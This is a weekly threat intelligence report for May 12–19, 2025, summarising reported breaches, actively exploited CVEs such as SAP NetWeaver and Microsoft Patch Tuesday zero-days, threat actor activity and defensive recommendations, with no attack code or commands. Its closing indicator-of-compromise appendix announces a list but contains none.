This report provides a concise overview of the cybersecurity threat landscape from May 12th to May 19th, 2025. The period was marked by the continued dominance of ransomware and data extortion groups, a significant number of actively exploited zero-day and critical vulnerabilities, and persistent activity from nation-state and cybercrime actors. AI-driven threats, particularly in social engineering and malware evasion, remain a growing concern. Organizations across all sectors, especially critical infrastructure and those handling sensitive data, faced elevated risks. Proactive patching, enhanced detection capabilities, and robust incident response planning are essential to navigate this complex environment.
2. Current Threat Landscape
The cybersecurity landscape during this reporting period remained highly dynamic and increasingly complex. AI continues to reshape both defensive and offensive capabilities, with threat actors leveraging generative AI for more convincing social engineering attacks, such as sophisticated phishing emails, voice cloning, and deepfake videos. This trend makes traditional detection methods more challenging.
Ransomware and data extortion continue to be prime threats, with a record number of victims posted to data leak sites in the first quarter of 2025. The frequency and sophistication of these attacks are on the rise. Beyond encryption, attackers are increasingly employing double and even anticipating triple extortion tactics, which may include data destruction or Distributed Denial-of-Service (DDoS) attacks. DDoS attacks themselves remain a formidable threat, capable of overwhelming networks and services.
Supply chain vulnerabilities continue to pose a significant risk, with complexity and lack of visibility into vendor security practices identified as major barriers to cyber resilience. Geopolitical tensions also continue to drive cyber operations, influencing the targeting and tactics of various threat actors. Insider threats, whether malicious or accidental, also contribute to the risk landscape.
3. Notable Security Incidents
The week of May 12th to May 19th saw several significant security incidents reported across various sectors globally. These incidents highlight the diverse range of threats organizations currently face:
Date Reported
Affected Entity
Location
Type of Incident
Threat Actor (if known)
Data Compromised (if known)
May 16, 2025
Coinbase
Unknown
Data Theft, Extortion Attempt
Unknown
User data
May 15, 2025
Nucor (Steelmaker)
USA
Cyber Incident (Production Halted)
Unknown
Unknown
May 14, 2025
Granicus (GovDelivery email system)
Unknown
Compromise
Unknown
Unknown
May 14, 2025
Central Point School District 6
Oregon, USA
Cyber Attack
Unknown
Unknown
May 13, 2025
Empresas Municipales de Cali (Emcali)
Colombia
Cyber Attack (System Shutdown)
Unknown
Unknown
May 12, 2025
Drug Safety Testing Center
Hong Kong
Ransomware
Unknown
Unknown
May 12, 2025
Lekardo Clinic
Russia
Cyber Attack
Pro-Ukraine Group
Unknown
May 12, 2025
Alabama State Government
USA
Cyber Event Investigation
Unknown
Unknown
May 2025 (Disclosed/Reported)
TeleMessage (US Officials’ App)
Unknown
Data Breach
Hacker
Unencrypted message data, names, and contact info
May 2025 (Disclosed/Reported)
SogoTrade, Inc.
USA
Data Breach (Occurred May 2024)
Unknown
Names, financial account numbers, SSNs, tax IDs
May 2025 (Disclosed/Reported)
SAP NetWeaver Users
Global
Exploitation
China-linked APTs, Russian Ransomware Groups
Unknown (Potential system compromise)
May 2025 (Disclosed/Reported)
PowerSchool Users
USA, Canada
Extortion Attempts (Following Dec 2024 Breach)
Hackers
SSNs, medical records, special education info
May 2025 (Disclosed/Reported)
M&S (Marks & Spencer)
UK
Cyber Attack (Operational Disruption)
Scattered Spider (Likely)
Basic contact info, dates of birth, order histories, possibly reference numbers
May 2025 (Reported)
Arla (Dairy Cooperative)
Germany
Cyber Incident
Unknown
Unknown
May 2025 (Reported)
Prismecs (Power Plant Operator)
Switzerland
Email Account Hacked
Unknown
Unknown
May 2025 (Reported)
Berliner Verkehrsbetriebe (BVG)
Germany
Cyber Attack (Service Provider)
Unknown
Unknown
May 2025 (Reported)
Berufsbildende Schule Westerburg
Germany
Cyber Attack
Unknown
Unknown
May 2025 (Reported)
Outwood Academy Acklam
UK
Cyber Attack, Data Breach Warning
Unknown
Unknown
May 2025 (Reported)
Dior
France
Unauthorized Access, Data Breach Disclosure
Unknown
Unknown
4. New Vulnerabilities and Critical CVEs
The week was notable for the release of Microsoft’s May 2025 Patch Tuesday updates on May 13th, which addressed a significant number of vulnerabilities, including several actively exploited zero-days.
Microsoft Patch Tuesday (May 13, 2025): Microsoft released 72-75 patches covering vulnerabilities across Windows, Office, Azure, and other products. Five to seven zero-day vulnerabilities were reported as actively exploited in the wild.
Windows Common Log File System (CLFS) Driver: Two Elevation of Privilege (EoP) zero-days, CVE-2025-32706 and CVE-2025-32701 (CVSS 7.8), were actively exploited. These allow a local authenticated attacker to gain SYSTEM privileges.
Windows Ancillary Function Driver for WinSock: An EoP zero-day, CVE-2025-32709 (CVSS 7.8), was actively exploited, allowing an attacker to gain administrator privileges. Exploitation may involve persuading a user to open a crafted file or visit a malicious website.
Microsoft DWM Core Library: An EoP zero-day, CVE-2025-30400 (CVSS 7.8), was actively exploited, allowing a local attacker to gain SYSTEM privileges.
Microsoft Scripting Engine: A Memory Corruption zero-day, CVE-2025-30397 (CVSS 7.5), was actively exploited. This vulnerability has high attack complexity and requires user interaction (clicking a crafted URL) while running Microsoft Edge in Internet Explorer mode.
Critical RCE Vulnerabilities: Patches included fixes for critical Remote Code Execution flaws in Windows Remote Desktop Services (CVE-2025-29966, CVE-2025-29967 – CVSS 8.8), Microsoft Office (CVE-2025-30377, CVE-2025-30386 – CVSS 8.4), and Windows Virtual Machine Bus (CVE-2025-29833 – CVSS 7.1).
SAP NetWeaver Vulnerabilities: CVE-2025-31324 (Missing Authorization Check, CVSS 9.1) and a related flaw, CVE-2025-42999 (CVSS 9.1), in SAP NetWeaver’s Visual Composer were actively exploited. These vulnerabilities allow unauthenticated file uploads and remote code execution. Exploitation has been attributed to China-linked APTs and Russian ransomware groups. CISA added CVE-2025-42999 to its KEV catalog on May 15th.
Commvault Command Center: CVE-2025-34028 (Path Traversal, CVSS 10.0) in Commvault Command Center (Innovation Release 11.38.0-11.38.19) was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 2nd due to active exploitation. This flaw allows unauthenticated remote attackers to execute arbitrary code.
OttoKit WordPress Plugin: CVE-2025-27007 (Privilege Escalation, CVSS 9.8) affecting OttoKit (formerly SureTriggers) WordPress plugin (versions <= 1.0.82) is under active exploitation. This allows unauthenticated attackers to potentially create administrator accounts. Mass exploitation was observed starting May 4th.
Apple AirPlay: A set of vulnerabilities dubbed “AirBorne,” including CVE-2025-24252 (Use-after-free, CVSS 9.8), CVE-2025-24132 (Buffer Overflow), and CVE-2025-24206 (Authentication Bypass), allow zero-click Remote Code Execution and wormable exploits on devices on the same local network. Apple has released patches for affected devices.
Output Messenger: A zero-day vulnerability, CVE-2025-27920 (Directory Traversal), in the messaging app Output Messenger is being exploited by the Marbled Dust threat actor.
Fortinet Products: A critical zero-day RCE vulnerability, CVE-2025-32756, affecting multiple Fortinet products is being exploited in the wild.
Ivanti EPMM: A vulnerability allowing unauthenticated RCE when chained with another flaw is being exploited in the wild.
Adobe Products: Adobe released 13 updates addressing 39 CVEs, 33 of which are critical, in various products including Photoshop, Animate, InDesign, and others.
5. Threat Actor Activities
Threat actor activity remained high and diverse during the reporting period, encompassing nation-state espionage, financially motivated cybercrime, and politically motivated hacktivism.
Nation-State Actors:
China-linked APTs: Multiple China-based threat groups, including UNC5221, UNC5174, and CL-STA-0048, were observed exploiting vulnerabilities in SAP NetWeaver. U.S. Cyber Command previously discovered Chinese malware implanted on partner networks in Latin America. UNC5174 is noted for its stealth and use of open-source tools.
Iran-linked Lemon Sandstorm: This state-sponsored group (also known as Rubidium, Parisite, Pioneer Kitten, UNC757, Fox Kitten) was attributed to a long-term intrusion into critical national infrastructure in the Middle East, leveraging VPN flaws and custom backdoors.
North Korean Kimsuky: This APT group (also known as Emerald Sleet, Velvet Chillima) continues to be active, employing social engineering, malicious documents, and living-off-the-land tools, often using PowerShell, to gather intelligence related to the Korean peninsula and nuclear policy. They have been observed using ClickFix social engineering tactics.
Russia-linked COLDRIVER: This threat actor was observed distributing the new LOSTKEYS malware, designed for file theft and system information gathering, using ClickFix social engineering lures.
Marbled Dust: Microsoft Threat Intelligence tracks this actor, observed exploiting a zero-day in Output Messenger (CVE-2025-27920) for regional espionage, potentially leveraging DNS hijacking or typo-squatted domains for initial access.
Cybercrime Groups:
Golden Chickens: This financially motivated group (also known as Venom Spider) operates a Malware-as-a-Service (MaaS) platform and has recently developed new credential theft and keylogging tools, TerraStealerV2 and TerraLogger. They supply malware to other prominent groups like FIN 6, Cobalt Group, and Evilnum.
Play Ransomware: Actors linked to the Play ransomware family were observed exploiting a Windows zero-day (CVE-2025-29824). Notably, in the observed activity, they deployed the Grixba info stealer instead of ransomware, indicating a potential shift towards data theft and extortion without encryption.
Scattered Spider: This notorious group (also known as Octo Tempest or UNC3944) is believed to be linked to recent cyberattacks causing operational disruption at UK retailers like M&S. They are known for targeting organizations with large quantities of PII and financial data.
BlackLock: This rapidly rising RaaS group, first seen in March 2024, uses custom malware and double extortion tactics, targeting Windows, VMware ESXi, and Linux systems.
DragonForce: This ransomware group is offering a white-label branding service for affiliates.
Hacktivist Groups:
NoName057(16): This pro-Russian group claimed responsibility for DDoS attacks against multiple Romanian government websites on May 4th. They have also targeted Dutch and other European organizations in retaliation for support of Ukraine and previously targeted Italian banks and airports. Their primary tactic is DDoS, often using their tool DDoSia.
6. Malware Spotlights
Several malware families and trends were prominent during this reporting period:
AI-Enhanced Malware: AI is increasingly used by criminals to mutate malicious code in real-time to evade detection. The emergence of “agentic AI ransomware,” where AI bots automate and expedite all stages of an attack, is predicted.
Fake Updates and Social Engineering: Malware distributed through malicious or compromised websites often uses fake browser or software update prompts to trick users into downloading payloads. The ClickFix social engineering technique, which manipulates users into executing malicious commands via fake prompts, is also being adopted by various actors, including Interlock and COLDRIVER.
Information Stealers: Lumma Stealer and XWorm continue to be prevalent. Gremlin Stealer, a new C#-based infostealer, is being sold on cybercrime forums and Telegram, designed to exfiltrate browser data, crypto wallets, and credentials. Golden Chickens’ new tools, TerraStealerV2 and TerraLogger, are focused on stealing browser credentials, crypto wallet data, and keylogging. AgeoStealer was observed disguised as a video game.
Remote Access Trojans (RATs): MintsLoader was found dropping the GhostWeaver RAT via phishing attacks. A malicious package in the PyPI repository disguised as Discord contained a fully functional RAT.
Supply Chain Compromises: Malicious npm packages targeting users of the Cursor code editor were discovered, implanting backdoors and stealing credentials. A compromised legitimate npm package, “rand-user-agent,” was found injecting code for a RAT.
Commodity Malware in Sophisticated Campaigns: Established malware families like FakeUpdates, Remcos, AgentTesla, Phorpiex, Rilide, Mirai, Qilin, Akira, and Anubis remain prevalent. Multi-stage campaigns are increasingly blending these commodity tools with advanced tactics like obfuscation and layered execution to evade detection.
Living-Off-The-Land (LotL): Threat actors continue to leverage legitimate system tools and services, including PowerShell and trusted Windows utilities, to blend in and evade detection. LotL phishing, using URLs of legitimate services to host or redirect to malicious content, is also increasing.
7. Recommendations
Given the current threat landscape, MCS recommends the following actions for organizations to enhance their cybersecurity posture:
For Technical Audiences:
Prioritize Patching: Immediately apply patches for critical vulnerabilities, especially those listed in CISA’s KEV catalog or reported as actively exploited, such as the Microsoft Patch Tuesday updates, SAP NetWeaver, Commvault Command Center, OttoKit, Apple AirPlay, Output Messenger, Fortinet, and Ivanti vulnerabilities.
Enhance Endpoint Security: Deploy and configure advanced Endpoint Detection and Response (EDR) or Managed Detection and Response (MDR) solutions capable of detecting and preventing exploit-like behavior, monitoring process activity (including WMI abuse), and identifying unusual file encryption. Implement application whitelisting to restrict unauthorized software execution.
Strengthen Network Defenses: Implement robust firewall rules, Intrusion Detection Systems (IDS), and DNS filtering to block access to known malicious domains and IPs, including those associated with C2 infrastructure and Tor.onion sites. Use network segmentation to isolate critical assets and limit lateral movement. Monitor network traffic for unusual outbound communication.
Improve Identity and Access Management: Implement strong access controls and the principle of least privilege for users and applications. Enforce multi-factor authentication (MFA) for all accounts, especially for remote access and privileged users. Consider adopting a Zero Trust architecture.
Secure Email and Collaboration Platforms: Implement advanced threat protection for emails to scan for malicious payloads and links. Disable macros by default in Office documents. Be vigilant about social engineering tactics used in email and collaboration platforms like Microsoft Teams.
Monitor for Living-Off-The-Land (LotL) Techniques: Enhance detection rules to identify the misuse of legitimate system tools and services (e.g., PowerShell, WMI, trusted Windows utilities) for malicious purposes.
Supply Chain Security: Increase visibility and oversight into the security practices of third-party vendors and suppliers. Monitor for compromises in software supply chains, including repositories like npm and PyPI.
For Non-Technical Audiences:
Security Awareness Training: Regularly train employees on recognizing and reporting phishing attempts, social engineering tactics (including fake updates and ClickFix lures), and suspicious communications. Emphasize the risks associated with clicking on links or downloading attachments from unknown sources.
Be Skeptical of Urgent Requests: Educate staff to verify urgent requests for information or action, especially those involving financial transfers or credential disclosure, through alternative communication channels, even if they appear to come from trusted sources or executives (BEC, deepfakes).
Use Strong, Unique Passwords and MFA: Encourage the use of strong, unique passwords for all accounts and enable multi-factor authentication whenever possible.
Report Suspicious Activity: Establish clear procedures for reporting any suspicious emails, system behavior, or potential security incidents to the IT or security team promptly.
Understand Data Sensitivity: Ensure employees understand the importance of protecting sensitive data and the potential consequences of data breaches.
General Recommendations:
Maintain and Test Backups: Regularly back up critical data and systems, store backups offsite and offline, and regularly test the restoration process to ensure business continuity in the event of a ransomware attack or data loss.
Develop and Practice Incident Response Plan: Have a well-defined and tested incident response plan in place to guide actions during a cyberattack, including roles, responsibilities, communication procedures, and containment strategies.
Stay Informed: Monitor reputable threat intelligence sources (like CISA, MS-ISAC, and industry-specific advisories) to stay updated on the latest threats, vulnerabilities, and mitigation strategies.
8. Analyst Notes
The observed trends this week underscore the increasing sophistication and adaptability of threat actors. The predicted rise of “agentic AI ransomware” highlights a potential future where attacks could become even faster and more autonomous. The continued use of fake victim claims by some ransomware groups complicates threat intelligence efforts and attribution. While zero-day exploitation remains a concern, the slight decline observed in some reports suggests that improved vendor security practices may be having some positive impact. However, the sheer volume and diversity of threats, coupled with the increasing cross-collaboration among different threat actor types, mean that organizations cannot afford to become complacent. The focus on less technical social engineering attacks targeting individuals, even high-value ones, demonstrates that the human element remains a critical vulnerability. The decrease in overall ransomware payments despite an increase in incidents suggests a growing reluctance among victims to pay, potentially influenced by poor decryptor quality and the risk of data leaks even after payment. Experts continue to strongly advise against paying ransoms.
9. Threat Indicator Appendix
This appendix provides a list of observed Indicators of Compromise (IOCs) related to threats discussed in this report. Security teams should use these indicators to enhance their detection and prevention capabilities.
Note on Sources and Intelligence: This report synthesizes information from various credible sources, including public advisories from organizations like CISA, MITRE, and MS-ISAC, alongside internal analysis and emerging threat intelligence. Efforts have been made to differentiate between confirmed intelligence and speculative or unverified information to maintain accuracy and credibility.
